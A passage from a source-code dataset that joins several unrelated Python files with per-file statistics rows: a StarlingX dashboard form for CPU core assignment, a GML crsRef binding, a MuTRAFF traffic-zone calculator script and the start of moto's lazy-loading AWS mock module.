        inventory detail page on failure.
        """
        host_id = data['host_id']
        del data['host_id']
        del data['host']
        try:
            host = sysinv.host_get(self.request, host_id)
            cpudata = {}
            sharedcpudata = {}
            platformcpudata = {}
            for key, val in data.items():
                if (('num_cores_on_processor' in key or 'function' in key)
                        and self._field_visible(key)):
                    cpudata[key] = val
                if 'platform_processor' in key and self._field_visible(key):
                    # sysinv expects platform counts under the generic
                    # num_cores_on_processorN keys.
                    platformcpudata['num_cores_on_processor' + key[-1:]] = val
                if ('num_shared_on_processor' in key
                        and self._field_visible(key)):
                    sharedcpudata[key.replace('shared', 'cores')] = val
            sharedcpudata['function'] = 'shared'
            platformcpudata['function'] = 'platform'
            sysinv.host_cpus_modify(request, host.uuid,
                                    platformcpudata,
                                    cpudata,
                                    sharedcpudata)
            msg = _('CPU Assignments were successfully updated.')
            LOG.debug(msg)
            messages.success(request, msg)
            return self.host.cpus
        except exc.ClientException as ce:
            # Display REST API error message on UI
            messages.error(request, ce)
            LOG.error(ce)
            # Redirect to failure pg
            redirect = reverse(self.failure_url, args=[host_id])
            return shortcuts.redirect(redirect)
        except Exception as e:
            LOG.exception(e)
            msg = _('Failed to update CPU Assignments.')
            LOG.info(msg)
            redirect = reverse(self.failure_url, args=[host_id])
            exceptions.handle(request, msg, redirect=redirect)
class AddCpuProfile(forms.SelfHandlingForm):
    """Form that snapshots a host's CPU assignments as a named cpu profile."""

    host_id = forms.CharField(widget=forms.widgets.HiddenInput)
    profilename = forms.CharField(label=_("Cpu Profile Name"),
                                  required=True)

    failure_url = 'horizon:admin:inventory:detail'

    def __init__(self, *args, **kwargs):
        super(AddCpuProfile, self).__init__(*args, **kwargs)

    def clean(self):
        # No extra validation beyond the base form's.
        return super(AddCpuProfile, self).clean()

    def handle(self, request, data):
        """Create the cpu profile via sysinv and report the outcome."""
        profile_name = data['profilename']
        try:
            profile = sysinv.host_cpuprofile_create(request, **data)
            msg = _(
                'Cpu Profile "%s" was successfully created.') % profile_name
            LOG.debug(msg)
            messages.success(request, msg)
            return profile
        except exc.ClientException as ce:
            # Surface the REST API error message on the UI, then send the
            # user back to the host detail page.
            messages.error(request, ce)
            LOG.error(ce)
            redirect = reverse(self.failure_url, args=[data['host_id']])
            return shortcuts.redirect(redirect)
        except Exception:
            msg = _('Failed to create cpu profile "%s".') % profile_name
            LOG.info(msg)
            redirect = reverse(self.failure_url,
                               args=[data['host_id']])
            exceptions.handle(request, msg, redirect=redirect)
| 43.07 | 79 | 0.557755 |
import logging
from cgtsclient import exc
from django.core.urlresolvers import reverse
from django import shortcuts
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from starlingx_dashboard.api import sysinv
LOG = logging.getLogger(__name__)
class UpdateCpuFunctions(forms.SelfHandlingForm):
host = forms.CharField(label=_("host"),
required=False,
widget=forms.widgets.HiddenInput)
host_id = forms.CharField(label=_("host_id"),
required=False,
widget=forms.widgets.HiddenInput)
platform = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
platform_processor0 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
platform_processor1 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
platform_processor2 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
platform_processor3 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
vswitch = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_cores_on_processor0 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor1 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor2 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor3 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
shared_vcpu = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_shared_on_processor0 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor1 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor2 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor3 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(UpdateCpuFunctions, self).__init__(*args, **kwargs)
self.host = kwargs['initial']['host']
if kwargs['initial']['platform_processor0'] == 99:
self.fields[
'platform_processor0'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields['platform_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor1'] == 99:
self.fields[
'platform_processor1'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields['platform_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor2'] == 99:
self.fields[
'platform_processor2'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields['platform_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor2'].help_text = \
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor3'] == 99:
self.fields[
'platform_processor3'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
self.fields['platform_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor3'].help_text = \
"Processor 3 has %s physical cores." % avail_socket_cores
if 'compute' not in self.host.subfunctions:
self.fields['vswitch'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor0'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor1'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor2'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor3'].widget = forms.widgets.HiddenInput()
else:
if kwargs['initial'][
'num_cores_on_processor0'] == 99:
self.fields[
'num_cores_on_processor0'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields[
'num_cores_on_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor1'] == 99:
self.fields[
'num_cores_on_processor1'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields[
'num_cores_on_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor2'] == 99:
self.fields[
'num_cores_on_processor2'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields[
'num_cores_on_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor2'].help_text =\
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor3'] == 99:
self.fields[
'num_cores_on_processor3'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
self.fields[
'num_cores_on_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor3'].help_text =\
"Processor 3 has %s physical cores." % avail_socket_cores
for s in range(0, 4):
processor = 'num_shared_on_processor{0}'.format(s)
if ('compute' not in self.host.subfunctions or
kwargs['initial'][processor] == 99):
self.fields[processor].widget = forms.widgets.HiddenInput()
else:
self.fields[processor].set_max_value(1)
self.fields[processor].help_text =\
"Each processor can have at most one shared core."
def clean(self):
cleaned_data = super(UpdateCpuFunctions, self).clean()
try:
cleaned_data['platform_processor0'] = str(
cleaned_data['platform_processor0'])
cleaned_data['platform_processor1'] = str(
cleaned_data['platform_processor1'])
cleaned_data['platform_processor2'] = str(
cleaned_data['platform_processor2'])
cleaned_data['platform_processor3'] = str(
cleaned_data['platform_processor3'])
cleaned_data['num_cores_on_processor0'] = str(
cleaned_data['num_cores_on_processor0'])
cleaned_data['num_cores_on_processor1'] = str(
cleaned_data['num_cores_on_processor1'])
cleaned_data['num_cores_on_processor2'] = str(
cleaned_data['num_cores_on_processor2'])
cleaned_data['num_cores_on_processor3'] = str(
cleaned_data['num_cores_on_processor3'])
cleaned_data['num_shared_on_processor0'] = str(
cleaned_data['num_shared_on_processor0'])
cleaned_data['num_shared_on_processor1'] = str(
cleaned_data['num_shared_on_processor1'])
cleaned_data['num_shared_on_processor2'] = str(
cleaned_data['num_shared_on_processor2'])
cleaned_data['num_shared_on_processor3'] = str(
cleaned_data['num_shared_on_processor3'])
num_platform_cores = {}
num_platform_cores[0] = cleaned_data.get('platform_processor0',
'None')
num_platform_cores[1] = cleaned_data.get('platform_processor1',
'None')
num_platform_cores[2] = cleaned_data.get('platform_processor2',
'None')
num_platform_cores[3] = cleaned_data.get('platform_processor3',
'None')
num_vswitch_cores = {}
num_vswitch_cores[0] = cleaned_data.get('num_cores_on_processor0',
'None')
num_vswitch_cores[1] = cleaned_data.get('num_cores_on_processor1',
'None')
num_vswitch_cores[2] = cleaned_data.get('num_cores_on_processor2',
'None')
num_vswitch_cores[3] = cleaned_data.get('num_cores_on_processor3',
'None')
num_shared_on_map = {}
num_shared_on_map[0] = cleaned_data.get('num_shared_on_processor0',
'None')
num_shared_on_map[1] = cleaned_data.get('num_shared_on_processor1',
'None')
num_shared_on_map[2] = cleaned_data.get('num_shared_on_processor2',
'None')
num_shared_on_map[3] = cleaned_data.get('num_shared_on_processor3',
'None')
if ('None' in num_platform_cores.values() or
'None' in num_vswitch_cores.values() or
'None' in num_shared_on_map.values()):
raise forms.ValidationError(_("Invalid entry."))
except Exception as e:
LOG.error(e)
raise forms.ValidationError(_("Invalid entry."))
cleaned_data['function'] = 'vswitch'
return cleaned_data
def handle(self, request, data):
host_id = data['host_id']
del data['host_id']
del data['host']
try:
host = sysinv.host_get(self.request, host_id)
cpudata = {}
sharedcpudata = {}
platformcpudata = {}
for key, val in data.items():
if 'num_cores_on_processor' in key or 'function' in key:
if key not in self.fields:
cpudata[key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
cpudata[key] = val
if 'platform_processor' in key:
update_key = 'num_cores_on_processor' + key[-1:]
if key not in self.fields:
platformcpudata[update_key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
platformcpudata[update_key] = val
if 'num_shared_on_processor' in key:
key2 = key.replace('shared', 'cores')
if key not in self.fields:
sharedcpudata[key2] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
sharedcpudata[key2] = val
sharedcpudata['function'] = 'shared'
platformcpudata['function'] = 'platform'
sysinv.host_cpus_modify(request, host.uuid,
platformcpudata,
cpudata,
sharedcpudata)
msg = _('CPU Assignments were successfully updated.')
LOG.debug(msg)
messages.success(request, msg)
return self.host.cpus
except exc.ClientException as ce:
messages.error(request, ce)
LOG.error(ce)
redirect = reverse(self.failure_url, args=[host_id])
return shortcuts.redirect(redirect)
except Exception as e:
LOG.exception(e)
msg = _('Failed to update CPU Assignments.')
LOG.info(msg)
redirect = reverse(self.failure_url, args=[host_id])
exceptions.handle(request, msg, redirect=redirect)
class AddCpuProfile(forms.SelfHandlingForm):
host_id = forms.CharField(widget=forms.widgets.HiddenInput)
profilename = forms.CharField(label=_("Cpu Profile Name"),
required=True)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(AddCpuProfile, self).__init__(*args, **kwargs)
def clean(self):
cleaned_data = super(AddCpuProfile, self).clean()
return cleaned_data
def handle(self, request, data):
cpuProfileName = data['profilename']
try:
cpuProfile = sysinv.host_cpuprofile_create(request, **data)
msg = _(
'Cpu Profile "%s" was successfully created.') % cpuProfileName
LOG.debug(msg)
messages.success(request, msg)
return cpuProfile
except exc.ClientException as ce:
messages.error(request, ce)
LOG.error(ce)
redirect = reverse(self.failure_url, args=[data['host_id']])
return shortcuts.redirect(redirect)
except Exception:
msg = _('Failed to create cpu profile "%s".') % cpuProfileName
LOG.info(msg)
redirect = reverse(self.failure_url,
args=[data['host_id']])
exceptions.handle(request, msg, redirect=redirect)
| true | true |
f7191d9a9dc651d2b6f271add852f02c238d421a | 272 | py | Python | catalog/bindings/csw/crs_ref.py | NIVANorge/s-enda-playground | 56ae0a8978f0ba8a5546330786c882c31e17757a | [
"Apache-2.0"
] | null | null | null | catalog/bindings/csw/crs_ref.py | NIVANorge/s-enda-playground | 56ae0a8978f0ba8a5546330786c882c31e17757a | [
"Apache-2.0"
] | null | null | null | catalog/bindings/csw/crs_ref.py | NIVANorge/s-enda-playground | 56ae0a8978f0ba8a5546330786c882c31e17757a | [
"Apache-2.0"
] | null | null | null | from dataclasses import dataclass
from bindings.csw.general_conversion_ref_type import CrsrefType
__NAMESPACE__ = "http://www.opengis.net/gml"
@dataclass
class CrsRef(CrsrefType):
    """Binding for the ``crsRef`` element in the GML namespace.

    Inherits its content model from :class:`CrsrefType`; the nested
    ``Meta`` class supplies the XML element name and namespace used by
    the (de)serializer.
    """

    class Meta:
        name = "crsRef"
        namespace = "http://www.opengis.net/gml"
| 22.666667 | 63 | 0.731618 | from dataclasses import dataclass
from bindings.csw.general_conversion_ref_type import CrsrefType
__NAMESPACE__ = "http://www.opengis.net/gml"
@dataclass
class CrsRef(CrsrefType):
class Meta:
name = "crsRef"
namespace = "http://www.opengis.net/gml"
| true | true |
f7191efcb8f233967b15e0f9433e0c54a591c370 | 3,760 | py | Python | tools/TAZ_CALCULATOR/mutraff_tazcalc.py | uahservtel/uah-gist-mutraff-bastra | b5a4eab4763e1cf9d914c4af8a77426391e71e31 | [
"Xnet",
"Linux-OpenIB",
"X11"
] | 3 | 2019-11-20T15:22:27.000Z | 2021-06-13T07:52:14.000Z | tools/TAZ_CALCULATOR/mutraff_tazcalc.py | uahservtel/uah-gist-mutraff-bastra | b5a4eab4763e1cf9d914c4af8a77426391e71e31 | [
"Xnet",
"Linux-OpenIB",
"X11"
] | null | null | null | tools/TAZ_CALCULATOR/mutraff_tazcalc.py | uahservtel/uah-gist-mutraff-bastra | b5a4eab4763e1cf9d914c4af8a77426391e71e31 | [
"Xnet",
"Linux-OpenIB",
"X11"
] | null | null | null | '''
Created on 09/12/2016
@author: Alvaro Paricio
@description: Calculator of TRAFFIC ASSIGNMENT ZONES (TAZ). Given a networkfile and a polygon description, get all the nodes of the network included inside the polygon.
'''
import sys
sys.path.insert(1,'lib')
import argparse as arg
from TazGeometry import taz_test, MuTazCalculator
# --------------------------------------------------------------
opts= {}
# --------------------------------------------------------------
def getConfig():
  """Parse the command line and return the options as a plain dict,
  with every input/output file name prefixed by the --net-path dir."""
  ap = arg.ArgumentParser(
      prog="mutraff_tazcalc",
      formatter_class=arg.RawDescriptionHelpFormatter,
      description='''\
 MuTRAFF TAZ Calculator
 Given an XML taz definition file based on polygon coordinates in GPS format(lat,lon), generate the associated SUMO TAZ definiton file with the edges contained inside each taz polygon.
 Examples:
 * Generate the TAZs associated to a given polygon:
      python mutraff_tazcalc.py -net alcalahenares.net.xml -nod alcalahenares.nod.xml -edg alcalahenares.edg.xml -mutaz alcalahenares.mutaz.xml -sumo_taz alcalahenares.taz.xml
         ''')
  # -- mandatory arguments ------------------------------------------------
  ap.add_argument("-net", "--in-net",
                  help='Input. SUMOs XML net description file',
                  default="mutraff.net.xml", required=True)
  ap.add_argument("-nod", "--in-nodes",
                  help='Input. SUMOs XML nodes description file',
                  default="mutraff.nod.xml", required=True)
  ap.add_argument("-edg", "--in-edges",
                  help='Input. SUMOs XML edges description file',
                  default="mutraff.edg.xml", required=True)
  ap.add_argument("-mutaz", "--in-mutaz",
                  help='Input. MUTRAFF XML description file',
                  default="mutraff.mutaz.xml", required=True)
  # -- optional arguments -------------------------------------------------
  ap.add_argument("-sumo_taz", "--out-sumo-taz",
                  help='Output. Generate output to SUMO TAZ XML description file',
                  required=False)
  ap.add_argument("-p", "--net-path",
                  help='Input. Path to locate files', default='.')
  ap.add_argument("-v", "--verbose", help='Verbose output',
                  default=False, action='store_true')
  ap.add_argument("-t", "--run-tests", help='Run tests',
                  default=False, action='store_true')
  ap.add_argument("-i", "--taz-id-seed",
                  help='USe this number as TAZ id numbering seed',
                  default="1000", required=False)

  opts = vars(ap.parse_args())

  # Prefix every input file with the base directory.
  for key in ('in_net', 'in_nodes', 'in_edges', 'in_mutaz'):
    opts[key] = opts['net_path'] + '/' + opts[key]
  # The output file is optional; prefix it only when it was given.
  if opts.get('out_sumo_taz'):
    opts['out_sumo_taz'] = opts['net_path'] + '/' + opts['out_sumo_taz']

  if opts['verbose']:
    print(opts)
  return opts
# --------------------------------------------------------------
def printBanner():
  # Print the tool's ASCII-art banner and contact details to stdout.
  # Take here the banner: http://patorjk.com/software/taag/#p=display&f=Doom&t=mutraff%20odgen
  # Font: Doom
  print(" _ __ __ _ _ ")
  print(" | | / _|/ _| | | | | ")
  print(" _ __ ___ _ _| |_ _ __ __ _| |_| |_ | |_ __ _ _______ __ _| | ___ ")
  print("| '_ ` _ \| | | | __| '__/ _` | _| _| | __/ _` |_ / __/ _` | |/ __|")
  print("| | | | | | |_| | |_| | | (_| | | | | | || (_| |/ / (_| (_| | | (__ ")
  print("|_| |_| |_|\__,_|\__|_| \__,_|_| |_| \__\__,_/___\___\__,_|_|\___|\n")
  print(" MUTRAFF TAZ Calculator")
  print(" alvaro.paricio@uah.es")
  print("")
# Script entry point: show the banner, parse options, then either run
# the geometry self-tests or perform the full TAZ calculation.
if __name__ == '__main__':
  printBanner()
  opts=getConfig()
  if( opts['run_tests'] ):
    # -t/--run-tests: exercise the TazGeometry self-tests only.
    taz_test()
  else:
    # Normal run: load the network/taz inputs, compute the edge set of
    # every TAZ polygon and dump the SUMO taz file.
    tazcalc = MuTazCalculator(opts)
    tazcalc.loadData()
    tazcalc.calculateTazs()
    tazcalc.dumpTazFile()
| 45.301205 | 183 | 0.611702 | import sys
sys.path.insert(1,'lib')
import argparse as arg
from TazGeometry import taz_test, MuTazCalculator
opts= {}
def getConfig():
parser = arg.ArgumentParser(
prog="mutraff_tazcalc",
formatter_class=arg.RawDescriptionHelpFormatter,
description='''\
MuTRAFF TAZ Calculator
Given an XML taz definition file based on polygon coordinates in GPS format(lat,lon), generate the associated SUMO TAZ definiton file with the edges contained inside each taz polygon.
Examples:
* Generate the TAZs associated to a given polygon:
python mutraff_tazcalc.py -net alcalahenares.net.xml -nod alcalahenares.nod.xml -edg alcalahenares.edg.xml -mutaz alcalahenares.mutaz.xml -sumo_taz alcalahenares.taz.xml
''')
parser.add_argument( "-net","--in-net", help='Input. SUMOs XML net description file', default="mutraff.net.xml", required=True)
parser.add_argument( "-nod","--in-nodes", help='Input. SUMOs XML nodes description file', default="mutraff.nod.xml", required=True)
parser.add_argument( "-edg","--in-edges", help='Input. SUMOs XML edges description file', default="mutraff.edg.xml", required=True)
parser.add_argument( "-mutaz","--in-mutaz", help='Input. MUTRAFF XML description file', default="mutraff.mutaz.xml", required=True)
parser.add_argument( "-sumo_taz","--out-sumo-taz", help='Output. Generate output to SUMO TAZ XML description file', required=False)
parser.add_argument( "-p","--net-path", help='Input. Path to locate files', default='.' )
parser.add_argument( "-v","--verbose", help='Verbose output', default=False, action='store_true')
parser.add_argument( "-t","--run-tests", help='Run tests', default=False, action='store_true')
parser.add_argument( "-i","--taz-id-seed", help='USe this number as TAZ id numbering seed', default="1000", required=False)
options = vars(parser.parse_args())
options['in_net'] = options['net_path'] + '/' + options['in_net']
options['in_nodes'] = options['net_path'] + '/' + options['in_nodes']
options['in_edges'] = options['net_path'] + '/' + options['in_edges']
options['in_mutaz'] = options['net_path'] + '/' + options['in_mutaz']
if 'out_sumo_taz' in options and options['out_sumo_taz']:
options['out_sumo_taz'] = options['net_path'] + '/' + options['out_sumo_taz']
if( options['verbose'] ):
print(options)
return options
def printBanner():
__ __ _ _ ")
print(" | | / _|/ _| | | | | ")
print(" _ __ ___ _ _| |_ _ __ __ _| |_| |_ | |_ __ _ _______ __ _| | ___ ")
print("| '_ ` _ \| | | | __| '__/ _` | _| _| | __/ _` |_ / __/ _` | |/ __|")
print("| | | | | | |_| | |_| | | (_| | | | | | || (_| |/ / (_| (_| | | (__ ")
print("|_| |_| |_|\__,_|\__|_| \__,_|_| |_| \__\__,_/___\___\__,_|_|\___|\n")
print(" MUTRAFF TAZ Calculator")
print(" alvaro.paricio@uah.es")
print("")
if __name__ == '__main__':
printBanner()
opts=getConfig()
if( opts['run_tests'] ):
taz_test()
else:
tazcalc = MuTazCalculator(opts)
tazcalc.loadData()
tazcalc.calculateTazs()
tazcalc.dumpTazFile()
| true | true |
f7191f1eaaa578d51a94826ccc2ece39d7ec093d | 9,695 | py | Python | moto/__init__.py | hudelgado/moto | b8cd79cd06a6cc591b0a51086ead50609af4dd4d | [
"Apache-2.0"
] | null | null | null | moto/__init__.py | hudelgado/moto | b8cd79cd06a6cc591b0a51086ead50609af4dd4d | [
"Apache-2.0"
] | null | null | null | moto/__init__.py | hudelgado/moto | b8cd79cd06a6cc591b0a51086ead50609af4dd4d | [
"Apache-2.0"
] | null | null | null | import importlib
import sys
from contextlib import ContextDecorator
def lazy_load(
    module_name, element, boto3_name=None, backend=None, warn_repurpose=False
):
    """Build a lazy proxy for ``element`` inside ``module_name``.

    The real submodule is imported (relative to the ``moto`` package) only at
    call time, which keeps ``import moto`` itself cheap.  The returned proxy
    carries metadata attributes used elsewhere in the package:
    ``name`` (module name without dots), ``element``, ``boto3_name`` and
    ``backend``.  If ``warn_repurpose`` is true, every call first emits a
    warning about the upcoming repurposing of the module.
    """
    def f(*args, **kwargs):
        if warn_repurpose:
            import warnings

            warnings.warn(
                f"Module {element} has been deprecated, and will be repurposed in a later release. "
                "Please see https://github.com/spulec/moto/issues/4526 for more information."
            )
        target_module = importlib.import_module(module_name, "moto")
        return getattr(target_module, element)(*args, **kwargs)

    dotless = module_name.replace(".", "")
    f.name = dotless
    f.element = element
    f.boto3_name = boto3_name or dotless
    f.backend = backend or f"{dotless}_backends"
    return f
# ---------------------------------------------------------------------------
# Public mock decorators.
# Each name below is a lazy proxy: importing this module does NOT import the
# per-service backend; the real implementation is imported only when the
# decorator is first used.  ``boto3_name=`` overrides the boto3 client name
# when it differs from the module name, and ``backend=`` overrides the
# default "<name>_backends" attribute name.  ``warn_repurpose=True`` marks
# decorators scheduled to change meaning in a later release.
# ---------------------------------------------------------------------------
mock_acm = lazy_load(".acm", "mock_acm")
mock_apigateway = lazy_load(".apigateway", "mock_apigateway")
mock_apigateway_deprecated = lazy_load(".apigateway", "mock_apigateway_deprecated")
mock_athena = lazy_load(".athena", "mock_athena")
mock_applicationautoscaling = lazy_load(
    ".applicationautoscaling", "mock_applicationautoscaling"
)
mock_autoscaling = lazy_load(".autoscaling", "mock_autoscaling")
mock_autoscaling_deprecated = lazy_load(".autoscaling", "mock_autoscaling_deprecated")
mock_lambda = lazy_load(
    ".awslambda", "mock_lambda", boto3_name="lambda", backend="lambda_backends"
)
mock_lambda_deprecated = lazy_load(".awslambda", "mock_lambda_deprecated")
mock_batch = lazy_load(".batch", "mock_batch")
mock_budgets = lazy_load(".budgets", "mock_budgets")
mock_cloudformation = lazy_load(".cloudformation", "mock_cloudformation")
mock_cloudformation_deprecated = lazy_load(
    ".cloudformation", "mock_cloudformation_deprecated"
)
mock_cloudfront = lazy_load(".cloudfront", "mock_cloudfront")
mock_cloudtrail = lazy_load(".cloudtrail", "mock_cloudtrail", boto3_name="cloudtrail")
mock_cloudwatch = lazy_load(".cloudwatch", "mock_cloudwatch")
mock_cloudwatch_deprecated = lazy_load(".cloudwatch", "mock_cloudwatch_deprecated")
mock_codecommit = lazy_load(".codecommit", "mock_codecommit")
mock_codepipeline = lazy_load(".codepipeline", "mock_codepipeline")
mock_cognitoidentity = lazy_load(
    ".cognitoidentity", "mock_cognitoidentity", boto3_name="cognito-identity"
)
mock_cognitoidentity_deprecated = lazy_load(
    ".cognitoidentity", "mock_cognitoidentity_deprecated"
)
mock_cognitoidp = lazy_load(".cognitoidp", "mock_cognitoidp", boto3_name="cognito-idp")
mock_cognitoidp_deprecated = lazy_load(".cognitoidp", "mock_cognitoidp_deprecated")
mock_config = lazy_load(".config", "mock_config")
mock_datapipeline = lazy_load(".datapipeline", "mock_datapipeline")
mock_datapipeline_deprecated = lazy_load(
    ".datapipeline", "mock_datapipeline_deprecated"
)
mock_datasync = lazy_load(".datasync", "mock_datasync")
mock_dms = lazy_load(".dms", "mock_dms")
mock_ds = lazy_load(".ds", "mock_ds", boto3_name="ds")
mock_dynamodb = lazy_load(".dynamodb", "mock_dynamodb", warn_repurpose=True)
mock_dynamodb_deprecated = lazy_load(".dynamodb", "mock_dynamodb_deprecated")
mock_dynamodb2 = lazy_load(".dynamodb2", "mock_dynamodb2", backend="dynamodb_backends2")
mock_dynamodb2_deprecated = lazy_load(".dynamodb2", "mock_dynamodb2_deprecated")
mock_dynamodbstreams = lazy_load(".dynamodbstreams", "mock_dynamodbstreams")
mock_elasticbeanstalk = lazy_load(
    ".elasticbeanstalk", "mock_elasticbeanstalk", backend="eb_backends"
)
mock_ec2 = lazy_load(".ec2", "mock_ec2")
mock_ec2_deprecated = lazy_load(".ec2", "mock_ec2_deprecated")
mock_ec2instanceconnect = lazy_load(".ec2instanceconnect", "mock_ec2instanceconnect")
mock_ecr = lazy_load(".ecr", "mock_ecr")
mock_ecr_deprecated = lazy_load(".ecr", "mock_ecr_deprecated")
mock_ecs = lazy_load(".ecs", "mock_ecs")
mock_ecs_deprecated = lazy_load(".ecs", "mock_ecs_deprecated")
mock_elastictranscoder = lazy_load(".elastictranscoder", "mock_elastictranscoder")
mock_elb = lazy_load(".elb", "mock_elb")
mock_elb_deprecated = lazy_load(".elb", "mock_elb_deprecated")
mock_elbv2 = lazy_load(".elbv2", "mock_elbv2")
mock_emr = lazy_load(".emr", "mock_emr")
mock_emr_deprecated = lazy_load(".emr", "mock_emr_deprecated")
mock_emrcontainers = lazy_load(
    ".emrcontainers", "mock_emrcontainers", boto3_name="emr-containers"
)
mock_events = lazy_load(".events", "mock_events")
mock_firehose = lazy_load(".firehose", "mock_firehose")
mock_forecast = lazy_load(".forecast", "mock_forecast")
mock_glacier = lazy_load(".glacier", "mock_glacier")
mock_glacier_deprecated = lazy_load(".glacier", "mock_glacier_deprecated")
mock_glue = lazy_load(".glue", "mock_glue")
mock_guardduty = lazy_load(".guardduty", "mock_guardduty")
mock_iam = lazy_load(".iam", "mock_iam")
mock_iam_deprecated = lazy_load(".iam", "mock_iam_deprecated")
mock_iot = lazy_load(".iot", "mock_iot")
mock_iotdata = lazy_load(".iotdata", "mock_iotdata", boto3_name="iot-data")
mock_kinesis = lazy_load(".kinesis", "mock_kinesis")
mock_kinesis_deprecated = lazy_load(".kinesis", "mock_kinesis_deprecated")
mock_kms = lazy_load(".kms", "mock_kms")
mock_kms_deprecated = lazy_load(".kms", "mock_kms_deprecated")
mock_logs = lazy_load(".logs", "mock_logs")
mock_logs_deprecated = lazy_load(".logs", "mock_logs_deprecated")
mock_managedblockchain = lazy_load(".managedblockchain", "mock_managedblockchain")
mock_opsworks = lazy_load(".opsworks", "mock_opsworks")
mock_opsworks_deprecated = lazy_load(".opsworks", "mock_opsworks_deprecated")
mock_organizations = lazy_load(".organizations", "mock_organizations")
mock_polly = lazy_load(".polly", "mock_polly")
mock_ram = lazy_load(".ram", "mock_ram")
mock_rds = lazy_load(".rds", "mock_rds", warn_repurpose=True)
mock_rds_deprecated = lazy_load(".rds", "mock_rds_deprecated")
mock_rds2 = lazy_load(".rds2", "mock_rds2", boto3_name="rds")
mock_rds2_deprecated = lazy_load(".rds2", "mock_rds2_deprecated")
mock_redshift = lazy_load(".redshift", "mock_redshift")
mock_redshift_deprecated = lazy_load(".redshift", "mock_redshift_deprecated")
mock_resourcegroups = lazy_load(
    ".resourcegroups", "mock_resourcegroups", boto3_name="resource-groups"
)
mock_resourcegroupstaggingapi = lazy_load(
    ".resourcegroupstaggingapi", "mock_resourcegroupstaggingapi"
)
mock_route53 = lazy_load(".route53", "mock_route53")
mock_route53_deprecated = lazy_load(".route53", "mock_route53_deprecated")
mock_route53resolver = lazy_load(
    ".route53resolver", "mock_route53resolver", boto3_name="route53resolver"
)
mock_s3 = lazy_load(".s3", "mock_s3")
mock_s3_deprecated = lazy_load(".s3", "mock_s3_deprecated")
mock_sagemaker = lazy_load(".sagemaker", "mock_sagemaker")
mock_secretsmanager = lazy_load(".secretsmanager", "mock_secretsmanager")
mock_ses = lazy_load(".ses", "mock_ses")
mock_ses_deprecated = lazy_load(".ses", "mock_ses_deprecated")
mock_sns = lazy_load(".sns", "mock_sns")
